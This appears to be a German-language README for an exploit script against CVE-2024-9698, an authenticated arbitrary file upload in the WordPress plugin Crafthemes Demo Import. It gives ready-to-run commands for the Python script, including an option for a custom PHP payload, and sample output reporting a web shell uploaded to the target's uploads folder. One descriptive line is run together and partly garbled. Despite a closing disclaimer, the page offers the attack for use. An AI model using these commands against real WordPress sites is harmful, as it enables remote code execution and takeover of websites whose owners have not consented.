
Crafthemes Demo Import <= 3.3 - Authentifiziert ( Admin+) Beliebiger Datei-Upload in process_uploaded_files
Dieser Exploit zielt auf eine kritische Schwachstelle (CVE-2024-9698) im Plugin Crafthemes Demo Import für WordPress ab. Die Schwachstelle ermöglicht es authentifizierten Administratoren, beliebige Dateien auf die betroffene WordPress-Website hochzuladen, was zu potenzieller Remote Code Execution (RCE) führen kann.
process_uploaded_filesreadme.txt extrahiert.admin-ajax.php, um eine benutzerdefinierte PHP-Shell hochzuladen.python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
Wenn Sie ein benutzerdefiniertes PHP-Payload hochladen möchten, verwenden Sie:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
Haftungsausschluss: Dieses Skript ist ausschließlich für Bildungs- und Sicherheitsforschungszwecke bestimmt. Die unbefugte Verwendung gegen Systeme ohne ausdrückliche Genehmigung ist rechtswidrig.